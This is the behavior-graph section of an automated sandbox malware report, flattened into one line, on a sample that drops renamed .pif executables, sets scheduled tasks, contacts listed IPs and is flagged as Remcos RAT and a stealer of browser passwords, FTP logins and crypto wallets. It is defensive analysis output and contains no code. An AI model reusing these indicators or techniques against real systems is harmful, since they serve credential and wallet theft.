                    behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1472119 Sample: mg9LPWGtPB.exe Startdate: 12/07/2024 Architecture: WINDOWS Score: 100 93 steamcommunity.com 2->93 95 sJavUoBfFUhkoScDaBgelALGvfC.sJavUoBfFUhkoScDaBgelALGvfC 2->95 97 4 other IPs or domains 2->97 117 Found malware configuration 2->117 119 Antivirus detection for URL or domain 2->119 121 Multi AV Scanner detection for dropped file 2->121 123 15 other signatures 2->123 11 mg9LPWGtPB.exe 70 2->11         started        15 wscript.exe 2->15         started        17 wscript.exe 2->17         started        signatures3 process4 file5 87 C:\Users\user\AppData\Local\Temp\Sensor, COM 11->87 dropped 133 Found stalling execution ending in API Sleep call 11->133 19 cmd.exe 2 11->19         started        23 EHIJJDGDHD.exe 61 11->23         started        25 cmd.exe 11->25         started        135 Windows Scripting host queries suspicious COM object (likely to drop second stage) 15->135 27 SolarSys.pif 15->27         started        29 SolarSys.pif 17->29         started        signatures6 process7 file8 83 C:\Users\user\AppData\Local\Temp\...\Hist.pif, PE32 19->83 dropped 125 Drops PE files with a suspicious file extension 19->125 127 Uses schtasks.exe or at.exe to add and modify task schedules 19->127 31 Hist.pif 42 19->31         started        36 cmd.exe 2 19->36         started        38 conhost.exe 19->38         started        46 7 other processes 19->46 85 C:\Users\user\AppData\Local\Temp\Featured, DOS 23->85 dropped 129 Multi AV Scanner detection for dropped file 23->129 131 Found stalling execution ending in API Sleep call 23->131 40 cmd.exe 3 23->40         started        42 conhost.exe 25->42         started        44 timeout.exe 25->44         started        signatures9 process10 dnsIp11 99 steamcommunity.com 23.192.247.89, 443, 64934 AKAMAI-ASUS United States 31->99 101 216.245.184.74, 64957, 80 SRS-6-Z-7381US United States 31->101 103 3 other IPs or domains 31->103 69 C:\Users\user\...\Windows_Services_AS[1].exe, PE32 31->69 dropped 71 C:\ProgramData\softokn3.dll, PE32 31->71 dropped 73 C:\ProgramData\nss3.dll, PE32 31->73 dropped 77 5 other files (3 malicious) 31->77 dropped 105 Found many strings related to Crypto-Wallets (likely being stolen) 31->105 107 Tries to harvest and steal ftp login credentials 31->107 109 Tries to harvest and steal browser information (history, passwords, etc) 31->109 111 Tries to steal Crypto Currency Wallets 31->111 75 C:\Users\user\AppData\Local\Temp\...\Bk.pif, PE32 40->75 dropped 48 Bk.pif 40->48         started        53 conhost.exe 40->53         started        55 tasklist.exe 40->55         started        57 7 other processes 40->57 file12 signatures13 process14 dnsIp15 89 91.92.246.78, 2404, 64962 THEZONEBG Bulgaria 48->89 91 geoplugin.net 178.237.33.50, 64963, 80 ATOM86-ASATOM86NL Netherlands 48->91 79 C:\Users\user\AppData\Local\...\SolarSys.pif, PE32 48->79 dropped 81 C:\Users\user\AppData\Local\...\SolarSys.js, ASCII 48->81 dropped 113 Detected Remcos RAT 48->113 115 Drops PE files with a suspicious file extension 48->115 59 cmd.exe 48->59         started        61 schtasks.exe 48->61         started        file16 signatures17 process18 process19 63 conhost.exe 59->63         started        65 schtasks.exe 59->65         started        67 conhost.exe 61->67         started       

                    Screenshots

                    Thumbnails

                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.